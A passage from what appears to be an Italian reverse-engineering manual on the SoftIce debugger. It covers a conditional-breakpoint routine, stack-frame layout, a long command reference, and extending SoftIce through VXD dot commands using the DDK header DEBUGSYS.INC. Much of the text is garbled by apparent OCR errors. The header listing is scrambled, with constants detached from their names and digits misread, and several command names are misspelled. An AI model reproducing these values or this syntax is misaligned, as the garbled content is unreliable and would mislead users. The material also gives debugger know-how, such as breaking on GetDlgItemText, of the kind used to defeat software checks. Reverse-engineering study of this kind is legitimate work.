9000 :24 JNE 34 ; se non è uguale a quello che vogliamo ritorna 
9000:30 INT 3 j se sei arrivato qui i registri sono 0K. BREAK 
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9000 : 34 IRET j ritorna 


A questo punto settiamo la routine come interrupt 99 il cui indirizzo è a 99*4. 
Adesso ci interessa fare in modo che ad ogni istruzione del nostro programma che 
stiamo debuggando venga chiamata la routine appena scritta. 

La funzione di breakpoint che viene chiamata ad ogni accesso alla memoria 
tramite la specifica DO può richiamare l’interrupt ed è quello che interessa a 
noi. 

Prima installiamo la nostra funzione 


ED 99*4 9000 


Oltre a questo è possibile usare il comando I3HERE per fare in modo che compaia 
la finestra di SoftIce quando un int3 viene chiamato. 


I3HERE 


In ultimis settiamo il breakpoint sul range di memoria in cui vogliamo che venga 
eseguito il controllo previsto dalla nostra routine. 


BPR segmento:indirizzo_partenza segmento:indirizzo_ fine R DO ‘GINT 99’ 


Come avevamo deto nel capitolo relativo all’assembler le funzioni utilizzano lo 
stack per il passaggio dei parametri per cui spesso ci si trova nella necessità 
di de-ferenziare questi valori tramite i registri ESP e EBP. 

Quale usare dipende dal prologo della funzione e da dove viene piazzato il 
breakpoint in relazione a questo. 

Molte funzioni a 32 bits possiedono il seguente prologo. 


PUSH EBP 
MOV EBP, ESP 
SUB ESP, size(local) 


Lo stack frame viene settato come segue: 


Stack Top Param N ESP+(n*4) or EBP+(n*4)+4 Pushed by caller 

Param #2 ESP+8 or EBP+C 
Param #1 ESP+4 or EBP+8 
RET EIP Stack pointer on Entry 

Current Base Pointer 

EBP (PUSH EBP, MOV EBP, ESP) 
Save EBP 
LOCALS+SIZE-1 Call prologue 


Stack pointer after 
prologue (SUB ESP...) 


LOCALS+0 
Save EBX Optional save of “C” registers 
Save ESI Register saved by compiler 
Current 
ESP 
Stack Bottom Save EDI Stack pointer after registers are saved 


In SI il riferimento a registri come ad esempio ESP+4 può essere eseguito con 


ESP ->4 


Per cui è possibile creare costrutti del tipo 


BPX IsWindow (ESP->4==10022) || (ESP->4==1001E) 


Quando seguite una funzione cercate sempre di capire che cosa trattano gli 
argomenti. 


COMANDI VISUALIZZAZIONE INFORMAZIONI 
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Come dicevo SI può essere attivato in qualsiasi istante grazie alla pressione 
dei tasti di attivazione. 

Molti comandi permettono la visualizzazione di informazioni sui task in 
funzione. 

Il primo comando è appunto TASK che visualizza le informazioni relative ai TASK 
a partire dal nome, all'indirizzo del segmento di stack e tante altre notizie. 
Informazioni relative ai processi possono essere estratte tramite il comando 
PROC. 

A sua volta le informazioni relative ai nomi dei processi e dei task possono 
essere usate come argomenti del comando CLASS che a sua volta restituisce 
informazioni sulle classi. 

Fornendo la specifica -X al comando CLASS si ottengono informazioni legate ad 
ogni classe compresi gli indirizzi della window procedure ecc. 

Il comando THREAD invece fornisce informazioni sui THREADS attivi. 

Nelle versioni per WIN98 la visualizzazione del codice avviene mostrando il 
numero del thread con a fianco gli indirizzi. 

Essendo possibile in SI visualizzare in qualsiasi istante il codice non è detto 
che quello visualizzato si relativo al programma voluto. 

Alcuni breakpoint infatti, se non viene specificato l’ID del processo o qualche 
cosa che lo identifichi, funzionano su tutti i task presenti. 

Prendiamo ad esempio un breakpoint legato alla lettura del testo di un campo 
d’edit, GetDlgItemText. 

SI mostrerà la sua windows attivata dal breakpoint a seguito di qualsiasi 
GetDlgItemText venga richiamata nel sistema. 

Le funzioni relative alla visualizzazione delle informazioni servoino appunto ad 
avere specifiche legate ad ogni processo in modo tale da poter eseguire delle 
selezioni con le successive funzioni di SI. 


VISUALIZZAZIONE DEI SEGMENTI 


Tutti i programmi, come abbiamo già detto, dispongono di un certo numero di 
segmenti utilizzati per vari scopi. 

Un segmento è sicuramente il Code Segment. 

I dati sono invece allocati nel Data Segment. 

I segmento di stack lo abbiamo già descritto. 

In ogni caso i vari registri di segmento ci permetono di capire quali sono i 
segmenti in un certo istante dell'esecuzione. 

Tramite il comando MAP32 di SoftIce è possibile eseguire una panoramica dei 
segmenti allocati in un certo momento. 

Per ogni programma caricato vengono mostrati i vari segmenti con le seguenti 
informazioni: 


OWNER OBJ_NAME OBJ# ADDRESS SIZE TYPE 
COMEXP . text 0002 014C:00005678 000000FCO CODE RW 
COMEXP .idata 0006 014C:00007890 00000FF00 IDATA RO 
Ecc. 


La seguente tabella mostra gran parte delle funzioni a disposizione di SoftIce. 
Si tratta di una tabella da me redata tramite le funzioni dei help presenti 
nella versione 3.24 per Windows 95. 

L'utilizzo di alcune tecniche particolari e quindi di alcune delle opzioni qui 
riportate verrà trattato più avanti. 


1. BREAKPOINT 


BPM, BPMB, BPMW, BPMD 
Breakpoint on memory access 


BPM [SIZE] ADDRESS [R|w|Rw|x] [DEBUG REGISTER] [IF EXPRESSION} [Do COMMAND] 


Pagina 370 di 991 


BPRW 


BPR 


BPIO 


BPINT 


BPX 


BMSG 


BSTAT 


CSIP 


BPMB, BPMW oR BPMD ADDRESS [R|w|Rw|x] [DEBUG REGISTER] [IF EXPRESSION} [DO COMMAND] 
Ex:  BPM 1234 RW 


Support conditional breakpoints and actions, and logging breakpoint to 
history buffer 

BPRW module-name | code selector [R|W|RW|T|TW] [IF expression] [DO action] 

Ex: BPRW GENERIC 


Breakpoint on memory range 
BPR address address [R|W|RW|T|TW] [IF ExPRESSION] [DO ACTION] 
Ex: BPR ESI EDI+32 RW 


Breakpoint on I/0 port 
BPIO [-h] PORT [R]|W|RW] [DEBUG REGISTER] [IF expression] [DO action] 
Ex: BPIO 3DA W 


Breakpoint on interrupt 
BPINT interrupt-number [IF expression] [DO action] 
Ex: BPINT 50 


Breakpoint on execution 
BPX address [IF expression] [DO action] 
Ex: BPX 282F20 


Breakpoint on Windows message 
BMSG hwnd [L] [begin msg [end msg]] [IF expression] 
Ex.: BMSG 49AC WM_MOUSEFIRST WM_MOUSELAST 


Breakpoint on statistics 
BSTAT [breakpoint #] 
Ex.: BSTAT 3 


Set CS:EIP range qualifier 
CSIP [OFF | [NOT] address address | [NOT] module name] 
Ex.: CSIP NOT CS:201000 CS:205FFF 


2. MANIPULATING BREAKPOINT 


BPE 


BPT 


BL 


BC 


BD 


BE 


Edit 
BPE breakpoint number 
Ex.: BPE 4 


Use as template 
BPT breakpoint number 
Ex.: BPT 0 


List 
BL 
Ex.: BL 


Clear 
BC list | * 
Ex.: BC * 


Disable 
BD list | * 
Ex.: BD 1,2,3,4 


Enable 
BE list | * 
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Ex.: BE 1,2,3,4 


BH 
History 
BH 
Ex.: BH 


3. DISPLAY/CHANGE MEMORY 


R 
Display/change registers contents 
R [-d | register name | register name [=] value] 
Ex.: R EZX=50 

U 


Unassemble instructions 
U [address [L lenght]] 
Ex.: U EIP-10 
D, DB, DW, DD, DS, DL, DT 
Display memory 
D [address [L lenght]] 
Ex.: D B8000 
E, EB, EW, ED, ES, EL, ET 
Edit memory 
E [address] [data] 
Ex.: E 40000 
PEEK size, addr 
Read from physical address 
PEEK [size] address 
Ex.: PEEKD A0000000 
POKE size addr val 
Write into physical address 
POKE [size] addr val 
Ex.: POKED F8000000 12345678 
PAGEIN 
Load a page into physical memory 
PAGEIN address 
Ex.: PAGEIN 401000 


Help 
H [command] 
Ex.: H DW 


Evalutate expression 
? expression 
Ex.: ? AX << 1 
VER 
Version 
VER 
Ex.: VER 
WATCH 
Add watch 
WATCH address 
Ex.: WATCH VariableName 
FORMAT 
Change format of data window 
FORMAT 
Ex.: FORMAT 


DATA 
Change data window 
DATA [window number(0-3)] 
Ex.: DATA 2 
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4. DISPLAY SYSTEM INFORMATION 


GDT 
Global description table 
GDT [selector | GDT base address] 
Ex.: GDT 28 
LDT 
Local description table 
LDT [selector | LDT base address] 
Ex.: LDT 28 
IDT 
Interrupts description table 
IDT [interrupt | IDT base address] 
Ex.: IDT 28 
TSS 
Task state 
TSS [TSS selector] 
Ex.: TSS 
CPU 
CPU register info 
CPU [-i] 
Ex.: CPU 
PCI 
PCI device info 
PCI [-raw] [bus device function] 
Ex.: PCI 
MOD 
Windows module list 
MOD [partial name *] 
Ex.: MOD 
HEAP 


Windows global heap 
HEAP [-1] [FREE | mod | sel | 32 [heap | process]] 
Ex.: HEAP GDI 
LHEAP 
Windows local heap 
LHEAP [selector | module name] 
Ex.: LHEAP DS 
VXD 
Windows VXD map 
VXD [partial name *] 
Ex.: VXD VPCID 
TASK 
Windows task list 
TASK 
Ex.: TASK 
VCALL 
VXD calls 
VCALL [partial name *] 
Ex.: VCALL VPCID* 
WMSG 
Windows messages 
WMSG [partial name *] [WMSG number] 
Ex.: WMSG WM_MOU* 
PAGE 
Page table info 
PAGE [address | [L lenght]] 
Ex.: PAGE DS:0 L 0 
PHYS 
Al11 virtual address for physical address 
PHYS physical address 
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Ex.: PHYS A0000 

STACK 
Call stack 
STACK [task name | thread type | SS:EBP] 
Ex.: STACK 

XFRAME 
Active exception frame 
XFRAME [frame address] 
Ex.: XFRAME EBP 

MAPV86 
v86 memory map 
MAPV86 [address] 
Ex.: MAPV86 

HWND 
Windows handle informations 
HWND [-x] [hwnd | [window level ] [task name]] 
Ex.: HWND progman 

CLASS 
Windows class informations 
CLASS [-x] [task name] 
Ex.: CLASS USER 

VM 
Virtual machine informations 
VM [-s] [VM ID] 
Ex.: VM 1 

THREAD 
Thread informations 
THREAD [TCB| ID | task name] 
Ex.: THREAD 

ADDR 
Display/change address context 
ADDR [context handle | task | *] 
ADDR 80FD602C 

MAP32 
32 bits section 
MAP32 [module handle | module name] 
Ex.: MAP32 kernel32 

PROC 
Process informations 
PROC [-xo] [task name] 
Ex.: PROC -x Explorer 

QUERY 
Process virtual address space map 
QUERY [[-x] address] [process type] 
Ex.: QUERY PROGMAN 

WHAT 
Identify type of a expression 
WHAT expression 
Ex.: WHAT system 

OBJDIR 
Information about obj directory 
OBJDIR object-directory 
Ex.: OBJDIR \Driver 

DEVICE 
Information about a device 
DEVICE [device name | address] 
Ex.: DEVICE HCDO 

DRIVER 
Information about a driver 
DRIVER [driver name | address] 
Ex.: DRIVER ne2000.sys 
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FOBJ 
Information about a file obj 
FOBJ pfile object 
Ex.: FOBJ EAX 
IRP 
Information about a IRP 
IRP pirp 
Ex.: IRP eax 


5. 1/0 PORTS COMMANDS 


I, IB, IW, ID 
Input from I/0 
I port 
Ex.: I 3DA 

0, OB, OW, OD 
Output to I/0 
O port value 
Ex. O 21 FF 


6. FLOW CONTROLS 


Return to host debugger 
X 
Ex.: X 


Go to address 
G [=address] [address] 
Ex.: G 231456 


Single step one instruction 
T [=address] [count] 
Ex.: T 


Step skipping calls, int, etc. 
P_[RET] 
Ex.,: P 
HERE 
Goto current cursor line 
HERE 
Ex. HERE 
EXIT 
Force an exit to Windows 
EXIT 
Ex.: EXIT 
GENINT 
Generate int 
GENIT [NMI | INT1 | INT3 | int-number] 
Ex.: GENINT 2 
HBOOT 
System boot (total reset) 
HBOOT 
Ex.: HBOOT 


ila MODE CONTROLS 


I1HERE 
Direct INT1 to SOFTICE 
I1HERE [ON | OFF] 
Ex.: I1HERE ON 
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I3HERE 


Direct INT3 to SOFTICE 
ISHERE [ON | OFF] 
Ex.: ISHERE ON 


ZAP 
Zap embedded INT1 e INT3 
ZAP 
Ex.: ZAP 
FAULTS 
Enable/Disable SOFTICE fault trapping 
FAULTS [ON | OFF] 
Ex.: FAULTS ON 
SET 


Change an internal variable 
SET [setvariable] [ON | OFF] [value] 
Ex.: SET FAULTS ON 


7. CUSTOMIZATION COMMANDS 


PAUSE 


Control display scroll mode 
PAUSE [ON | OFF] 
Ex.: PAUSE ON 


ALTKEY 


FKEY 


DEX 


CODE 


COLOR 


Set key sequence to invoche Windows 
ALTKEY [alt letter | controll letter] 
Ex.: ALTKEY ALT D 


Display/Set F key 
FKEY [function key string] 
Ex.: FKEY F1 DD; G @ESP 


Display/Assign window data expressions 
DEX [windows number(0-3)] [expression] 
Ex.: DEX 2 esp 


Display/Instructions in code window 
CODE [ON | OFF] 
Ex.: CODE ON 


Display/Set screen color 
COLOR [normal] [bold] [reverse] [help] [line] 
Ex.: COLOR 30 3E1F 1E 34 


ANSWER 


TABS 


LINES 


WIDTH 


Auto answer with modem 
ANSWER [On [com port]] [bauds rate] [i=init] | OFF] 
Ex.: ANSWER 1 38400 


Set/Display tab setting 
TABS [1-8] 

Ex.: TABS 4 

x 

Set/Display num of lines 
LINES [25 | 43 | 50 | 60] 
Ex.: LINES 50 

x 

Set/Display num of columns 
WIDTH [80-160] 

Ex.: WIDTH 80 
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PRN 
Set printer out 
PRN [lptx | comx] 
Ex. PRN LPT1 
PRINT-SCREEN (KEY) 
Send to print 
PRINT -SCREEN 
Ex.: PRINT-SCREEN 


MACRO 
Macro to execute 
MACRO [macro name] [[*] | [= “macro body”]] 
Ex.: MACRO 0ops = “ihere off; genint 3” 


8. UTILITY 


Assemble code 
A [address] 
Ex.: A CS:1236 


Search for data 
S [-cu] address L lenght data-string 
Ex. S 0 L ffffff ‘Help’, OD, 0A 


Fill memory with data 
F addresas L lenght data-string 
Ex. F EBX L 50 ‘ABC’ 


Move data 
M address L lenght address-2 
Ex.: M 4000 L 80 8000 


Compare 2 data blocks 
C address L lenght address-2 
Ex.: C 400 L 80 EBX 


9. WINDOW COMMANDS 


WC 
Toggle code window 
WC [window size] 
Ex. WC 8 
WD 
Toggle data window 
WD [window size] 
Ex.: WD 8 
WF 
Toggle floating point stack window 
WF [-D] [BIJW]|D]JF{[P] *] 
Ex.: WF 
WL 
Toggle locals window 
WL [window size] 
Ex. WL 8 


Toggle watch window 


Www 
Ex.: WW 
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EC 
Enable/Disable code window 
EC 
Ex.: EC 
Locate current instruction 
Ex. 


10. WINDOW CONTROLS 


CLS 
Clear 
CLS 
Ex.: CLS 

RS 
Restore program screen 
RS 
Ex.: RS 

ALTSCR 
Change to alternate display 
ALTSCR [MONO | VGA | OFF] 
Ex.: ALTSCR OFF 

FLASH 


Restore screen during P or T command 
FLASH [ON | OFF] 
Ex.: FLASH ON 


11. SYMBOL/SOURCE COMMANDS 


SYM 
Display symbols 
SYM [partial name* | symbol name] 
Ex.: SYM hDC* 
SYMLOC 
Relocate symbols base 
SYMLOC segment | O | R | -C process type | section selector base 
Ex. SYMLOC 9D5 
EXP 
Display export symbols 
EXP [partial name*] 
Ex.: EXP GLOB* 
SRC 
Toggle source/mixed 
SRC 
Ex.: SRC 
TABLE n 
Select/Remove symbol table 
TABLE [[R] table-name | AUTOON | AUTOOFF] 
Ex.: TABLE test 
FILE 
Display/Change current source 
FILE [file name | *] 
Ex.: FILE * 
SS 


Search source for string 
SS [line number] [ ‘search string’] 
Ex.: SS 40 ‘if(i==3)’ 
TYPES type-name 
List all types 
TYPE [type name] 
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Ex.: TYPE DWORD 
LOCALS 
Display locals currently in scope 
LOCALS 
Ex.: LOCALS 


12. BACKTRACE 


SHOW 
Display from backtrace buffer 
DSHOW [start] [L lenght] 
Ex.: DSHOW 100 
TRACE 
Enter backtrace simulation mode 
TRACE [B ! OFF | START] 
Ex.: TRACE OFF 
XT 
Step in trace simulation mode 
XT [R] 
EX.: XT 
XP 
Program step in trace simulation mode 
XP 
Ex.: XP 
XG 
Go to address in trace simlation mode 
XG [R] address 
Ex.: XG 2000 
XRSET 
Reset backtrace history 
XRSET 
Ex.: XRSET 


13. SPECIAL OPERATOR 


Preceding a decimal number 


$ Preceding address specification segment 

# Preceding selector 

@ Preceding address indirector 

? Expression valutator 

14. NEW 

SET SYMBOL on|off If on the disassembler display symbol names 
WSTR 


Use this operator with the expression valutator 
WSTR type cast operator 
Ex.: ? WSTR(eax) 


ESTENDERE SOFTICE USANDO I SERVIZI API DI DEBUGGING 


SoftIce, coma abbiamo visto, costituisce il più potente debugger in circolazione 
e combinato con un altro sistema come IDA fornisce quanto di più uno dedicato 


alla reverse engineering può desiderare. 


In ogni caso esistono diversi pacchetti in giro che permettono di espandere 
SoftIce aggiungendogli altri comandi nuovi o atti a modificare quelli esistenti. 
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Per creare l’estensione che segue dovremo essere in grado di creare un nuovo VXD 
per cui ci sarà necessario il Microsoft DDK (Device Development Kit) e il MASM 
per la compilazione. 

Nello stesso DDK è inserito quanto necessario per estendere le funzioni di 
debugging. 

Date un occhiata al seguente file (DEBUGSYS.INC fornito con il DDK). 


ifndef _DEBUGSYS_H 
_DEBUGSYS_H EQU 1 
D386_RM_Int EQU 68H 
D386_Id EQU 0F386H 
D386_MIN EQU 43H 
D386_IdentifyEQU 43H 
D386_Prepare_PMode EQU 44H 


WDEB_INT2F_STARTING EQU OH 
WDEB_INT2F_ENDING EQU 1H 
WDEB_INT2F_NESTED_STARTINGEQU 2H 
WDEB_INT2F_NESTED_ENDING EQU 3H 
PMINIT_INIT_IDT EQU OH 
PMINIT_INIT_PAGING EQU 1H 
PMINIT_ENABLE_DEBUG_QUERYS EQU 2H 


D386_Real_Mode_Init EQU 45H PMINIT_INIT_SPARE_PTE EQU 3H 
D386_Set_Switches EQU 46H PMINIT_SET_ENTER_EXIT_VMM EQU 4H 
D386_Execute_Cond EQU 47H PMINIT_GET_SIZE_PHYS EQU 5H 
D386_Free_Segment —EQU 48H PMINIT_SET_BASE_SPARE_PTE EQU 6H 
D386_Set_Baudrate EQU 49H PMINIT_ENABLE_MEMORY_CONTEXT EQU 


D386_Reinit EQU 4aH TH 
D386_Def_Deb_Segs EQU 4bH PMINIT_MAX EQU TH 
D386_Set_Com_Port EQU 4cH WdebVCPIInfo STRUC 


D386_Link_SymEQU 4dH fnVCPI DF ? 
D386_Unlink_Sym EQU 4eH rdsVCPI DW ? 
D386_Remove_Segs EQU 4fH laVTP DD ? 
D386_Load_Segment EQU 50H Port67 DW ? 


D386_Display_Char EQU 51H WdebVCPIInfo ENDS 
D386_Display_Str EQU 52H 


D386_IsVxDInstalled EQU 53H 


D386_VxDInstall EQU 54H VTP STRUC 
D386_RegisterDotCmd EQU 55H zaCr3VTP DD 
D386_DeRegisterDotCmd EQU 56H laGdtrVTP DD 


laIdtrVTP DD 
selLdAtVTP DW 


D386_Printf EQU 57H 
D386_Link_Sym_Phys EQU 58H 


NU 


D386_CheckMapEQU 59H selTrVTP DW 
D386_SetAutoLoadSym EQU 5aH ipVTP DW ? 
D386_SetTeftiPort EQU 5bH unusedVTP DW ? 
D386_ExecDebugCommand EQU 5cH CSVTP DW ? 
D386_LoadCodeDataHigh EQU 5dH VTP ENDS 


D386_SetWinVersion EQU 5eH VCPI_RM_CALLOUT_INT EQU 67H 


D386_ScanChar EQU 5fH VCPI_PROT_ENTRY EQU ODEOCH 
D386_UnGetChar EQU 60H Debug_Serv_Int EQU 41H 
D386_Stop EQU 61H DS_Out_Char EQU OH 
ifdef WDEB98 DS_In_Char EQU 1H 
D386_Set_Baudrate_Ex EQU 62H DS_Out_Str EQU 2H 
D386_SetBuildInfo EQU 63H DS_Is_Char EQU 3H 
D386_Set_Switches_Ex EQU 64H DS_Out_Str16 EQU 12H 
D386_MAX EQU 64H DS_ForcedG016EQU 40H 
else DS_LinkMap EQU 45H 
D386_MAX EQU 61H DS_UnlinkMap EQU 46H 
endif DS_CheckMap EQU 47H 
ST_code_sel EQU OH DS_IsAutoLoadSym EQU 48H 
ST_data_sel EQU 1H DS_DebLoaded EQU 4FH 
ST_code_seg EQU 10H DS_DebPresent EQU 0F386H 
ST_data_seg EQU 11H DS_LoadSeg EQU 50H 
ST_dual_code EQU 40H DS_LoadSeg_32EQU 0150H 
ST_dual data EQU 41H DS_MoveSeg EQU 51H 
ST_device_code EQU 80H DS_FreeSeg EQU 52H 
ST_device_data EQU 81H DS_FreeSeg_32EQU 0152H 
D386_Device_Params STRUC DS_DGH EQU 56H 
DD_logical_seg DW ? DS_DFL EQU 57H 
DD_actual_sel DW ? DS_DLL EQU 58H 
DD_base DD ? DS_StartTask EQU 59H 
DD_length DD ? DS_Kernel_Vars EQU 5aH 
DD_name DF ? DS_VCPI_Notify EQU 5bH 
DD_sym_name DF ? DS_ReleaseSegEQU 5cH 
DD_alias_sel DW ? DS_User_Vars EQU 5dH 
D386_Device_Params ENDS DS_POSTLOAD EQU 60H 
DS_EXITCALL EQU 62H 
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DS_INT2 EQU 63H 
DS_LOADDLL EQU 64H 
DS_DELMODULE EQU 65H 
DS_LOGERROR EQU 66H 
DS_LOGPARAMERROR EQU 
DS_RIN EQU 09H 
DS_BANKLINE EQU OAH 
DS_NEWTASK EQU OBH 
DS_FLUSHTASK EQU OCH 
DS_SWITCHOUT EQU ODH 
DS_SWITCHIN EQU OEH 
DS_IntRings EQU 20H 
DS_IncludeSegs EQU 
MaxDebugSegs EQU 20 
DS_CondBP EQU 0FO01H 
DS_ForcedBP EQU 0F002H 
DS_ForcedG0 EQU 0F003H 
DS_HardINT1 EQU 0F004H 
DS_Out_SymbolEQU OFH 
DS_Disasm_InsEQU 10H 
DS_JumpTableStart EQU 


DS_RegisterDotCommand 

DS_RegisterDotCommand16 
DS_DeRegisterDotCommand 
DS_Printf EQU 73H 
DS_Printf16 EQU T4H 
DS_GetRegisterSet EQU 


67H 


21H 


70H 
EQU 
EQU 
EQU 


75H 


DS_SetAlternateRegisterSet EQU 


DS_GetCommandLineChar 
DS_EvaluateExpression 


DS_VerifyMemory EQU 
DS_PrintRegisters EQU 
DS_PrintStackDump EQU 
DS_SetThreadID EQU 


DS_ExecDebugCommand EQU 


DS_GetDebuggerInfo 
DS_CheckFault EQU 
DS_SetBreak EQU 
DS_RedirectExec 


EQU 
7fH 
80H 
EQU 


DS_PassOnDebugCommand 


DS_TrapFault EQU 83H 
DS_SetStackTraceCallBack 
DS_RemoveSegs EQU 85H 
DS_DefineDebugSegs EQU 
DS_SetBaudRate EQU 
DS_SetComPort EQU 88H 
DS_ChangeTaskNum EQU 
DS_ExitCleanup EQU 


DS_InstallVGAHandler 


DS_GetComBaseEQU 8cH 
DS_GetSymbol EQU 8dH 
DS_CopyMem EQU 8eH 
ifdef WDEB98 

DS_SetBaudRateEx EQU 
DS_Reserved® EQU 90H 
DS_Reserved1 EQU 91H 
DS_Reserved2 EQU 92H 
DS_Reserved3 EQU 93H 
DS_Reserved4 EQU 94H 
DS_Reserved5 EQU 95H 
DS_Reserved6 EQU 96H 
DS_Reserved7 EQU 97H 
DS_Reserved8 EQU 98H 
DS_Reserved9 EQU 99H 
DS_Reserved10EQU 9AH 


DS_Reserved11EQU 9BH 


DS_Reserved12EQU 


9CH 


DS_Reserved13EQU 9DH 
DS_Reserved14EQU 9EH 
DS_Reserved15EQU 9FH 
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EQU 
EQU 
79H 
7aH 
7bH 
7cH 
7dH 
7eH 


81H 
EQU 
EQU 


86H 
87H 


89H 


8aH 
EQU 


8fH 


70H 
T1H 
12H 


76H 
TIH 
18H 


82H 


84H 


8bH 


DS_InstallVvxDThunk 
DS_ThunkDownTo016 
DS_JumpTableEnd 
else 
DS_JumpTableEnd 
endif 


SaveRegs_Struc 


Debug_EAX DD 
Debug_EBX DD 
Debug_ECX DD 
Debug_EDX DD 
Debug_ESP DD 
Debug_EBP DD 
Debug_ESI DD 
Debug_EDI DD 
Debug_ES DW 
Debug_SS DW 
Debug_DS DW 
Debug_FS DW 
Debug_GS DW 
Debug_EIP DD 
Debug_CS DW 


dwReserved DD 
Debug_EFlags DD 
Debug_CR0 DD 
Debug_GDT DB 
Debug_IDT DB 
Debug_LDT DW 


EQU GAGH 
EQU OA1H 
EQU OA1H 
EQU 8eH 
STRUC 

? 

? 

? 

? 

2 

5, 

Y; 

3 

? 

2 

? 

? 

? 

? 

2 

? 

? 

Li 


SIZE QWORD DUP (?) 
SIZE QWORD DUP (?) 


O) 


Debug_TR DW ? 
Debug_CR2 DD ? 
Debug_CR3 DD ? 
Debug_DR0 DD ? 
Debug_DR1 DD ? 
Debug_DR2 DD ? 
Debug_DR3 DD ? 
Debug_DR6 DD ? 
Debug_DR7 DD ? 
Debug_DR7_2 DD ? 
Debug_TR6 DD ? 
Debug_TR7 DD ? 
Debug_TrapNumber DW ? 
Debug_ErrorCode DW ? 
SaveRegs_Struc ENDS 
DebInfoBuf STRUC 
DIB_MajorVersion DB ? 
DIB_MinorVersion DB ? 
DIB_Revision DB ? 
DIB_Reserved DB ? 
DIB_DebugTrap16 DD ? 
DIB_DebugTrap32 DF ? 
DIB_DebugBreak16 DD ? 
DIB_DebugBreak32 DF 
DIB_DebugCtr1lC16 DD ? 
DIB_DebugCtr1lCc32 DF 
DebInfoBuf ENDS 
BreakStruc STRUC 
BS_BreakEIP DD ? 
BS_BreakCS DW ? 
BS_BreakESP DD ? 
BS_BreakSS DW ? 
BreakStruc ENDS 
RedirectExecStruc  STRUC 
RDE_fpbufDebugCommand DF ? 


RDE_cbDebugCommand DW 


? 


RDE_fpszInput DF 
RDE_usFlags DW 
RDE_cbOutput DD 


? 
? 
? 


RDE_fpbufOutput DF ? 
RedirectExecStruc ENDS 


REPEAT_FOREVER_CHAR EQU OfeH 


AddrS STRUC 


Addroff DD ? 
AddrSeg DW ? 
AddrType DB ? 
AddrSize DB ? 
AddrTask DW ? 
AddrS ENDS 


EXPR_TYPE_SEGEQU 0001H 
EXPR_TYPE_SELEQU 0009H 
EXPR_TYPE_LINEQU 0002H 
EXPR_TYPE_PHYEQU 000AH 
EXPR_TYPE_LOGEQU 0008H 
EXPR_TYPE_MODEQU 000BH 
DEBUG_FAULT_TYPE_V86 EQU 0001H 
DEBUG_FAULT_TYPE_PM EQU 0002H 
DEBUG_FAULT_TYPE_RINGO EQU 0004H 
DEBUG_FAULT_TYPE_FIRST EQU 0008H 
DEBUG_FAULT_TYPE_LAST EQU 0010H 
Win386_Query_Int EQU 22H 
Win386_Alive EQU 0 

Win386_Q_Ack EQU 0F386H 
Win386_Query EQU 1 
Win386_PhysToLinr EQU 2 
Win386_AddrValid EQU 3 
Win386_MapVM EQU 4 
Win386_UnmapVM EQU 
Win386_GetDLAddr EQU 
Win386_GetVXDName EQU 7 
Win386_GetPDEEQU 8 
Win386_GetFrame EQU 9 
Win386_GetLDTAddress EQU 10 
Win386_GetThreadID EQU 11 
Win386_GetTSHandler EQU 12 


Win386_GetArplHandler EQU 13 
Max_Win386_Services EQU 13 
endif 
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Il sistema originariamente era stato disegnato per il debugger WDEB386 della 
Microsoft. 

La teoria è legata al fatto di creare comandi che dovranno essere inseriti in 
SoftIce mediante un punto precedente al comando stesso ( .comando xxx). 

I devices driver virtuali vengono riferiti con il termine VXD i quali sono in 
forma generale dei file eseguibili a 32 bits i quali possiedono il più alto 
privilegio possibile nel ringo. 

Il discorso dei vari ringx è relativo al sistema di gestione del sistema 
operativo, ovvero è un metodo interno all’ 0S di cui vedremo qualche cosa 
parlando come argomento del sistema di SoftIce per l’intercettazione dei faults. 
Il tipo di eseguibile non è PE ma LE (linear executable) ovvero un vecchio tipo 
di eseguibile. 

Ultimamente la loro importanza è diventata notevole tanto che la Microsoft ha 
aggiunto al possibilità di leggere dinamicamente questi file. 

In passato venivano usati soltanto per creare device virtuali di periferiche 
hardware mentre ai nostri giorni troviamo tante perti di codice inserite in 
questi file al fine di velocizzare l’esecuzione oppure per guadagnare l’accesso 
a risorse di sistema riservate. 

L'interfaccia del debugger in modo protetto sotto Windows 95 o superiore 
fornisce un metodo molto semplice per permettere il colloquio tra DLL a 32 bits, 
VXD e il sistema. 

In Win95 questo sistema è accessibile tramite l’ INT41h. 

Tra le altro cose l'interfaccia dell’int41h permette a un VXD di fornire delle 
routines specifiche di debug le quali possono essere chiamate dalla console di 
debug. 

In teoria qualsiasi debugger a livello di sistema può essere esteso in questo 
modo. 

Questo va detto con cautela visto che non tutte le funzioni fornite dall’int41h 
sono implementate dal vostro debugger. 

SoftIce, tanto bene quanto il WinDbg di Microsoft le supporta anche se di fatto 
non può garantire nulla in quanto queste estensioni sono implementate nel VMM il 
quale non è parte di SoftIce. 

Inoltre le estensioni .punto non possono eseguire controlli legati agli errori e 
tantomeno sapere quali potrebbero essere le necessità di sistema. 

L’inoltro di un comando .punto in un momento non idoneo potrebbe creare un crash 
di sistema. 

Comunque ritorniamo al metodo per implementare delle estensioni a SoftiIce. 

Come dicevamo prima il modo è appunto quello di usare il punto innanzi al 
comando come mostrato prima. 

Andando sotto SoftIce e digitando 


. VMMm 


avremo mostrata una finestra con un menu composto da diverse opzioni di debug le 
quali non sono parte di SoftIce ma implementate tramite vmm.vxd (Virtual Machine 
Manager). 

Quando inviamo o digitiamo un comando .VXDnome il sistema invia un messaggio 
Debug_Query allo specifico device virtuale. 

Se la procedura di ControlDispatch del VXD di traget supporta un handler per 
questo messaggio allora il controllo gli viene passato. 

La procedura per la gestione del messaggio di Debug_ Query deve risiedere in un 
segmento locked (ovvero bloccato e non scaricabile su disco neppure dalla 
gestione cache). 

Se fosse dentro ad un pageable code-segment il vostro sistema potrebbe sganciare 
la procedura se questa fosse residente, in quel momento, su disco come pagina 
scaricata dalla memoria. 

Entrando nuovamente in SoftIce e digitando 


. My 
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Qui entrerebbe in ballo un discorso relativo alle versioni a disposizione del 
sistema operativo in base al fatto che disponiate di una versione compilata di 
debug o una normale di commercializzazione. 

Questo discorso è legato al fatto che sotto la versione di debug esistono alcuni 
VXD in più rispetto all'altra versione. 

In ogni caso dovreste avere a video il range della vostra memoria valida. 

A questo punto è importante conoscere come il debugger chiama questo codice e 
come riesce ad avere i limiti validi della memoria fisica. 

Implementare un comando punto (dot) è come imporre una certa architettura al 
server VXD. 

In questo caso il comando sarebbe .M e non .MY. 

Il successivo Y sarebbe un parametro passato al’handler con questo comando. 
Quando il server VXD sta inizializzando la sua interfaccia di debug deve 
richiamare una funzione chiamata RegisterDotCommand (INT 41h - servizio 70h 
AX=70h) per rehgistrare il comando in questione nel sistema di debugger. 
Fondamentalmente registrare un comando dot fornisce al sistema di debugger un 
entry point con il quale può essere chiamato quando viene inviato un tale 
comando. 

Per vedere quali comandi dot sono registrati è sufficiente inviare un comando 


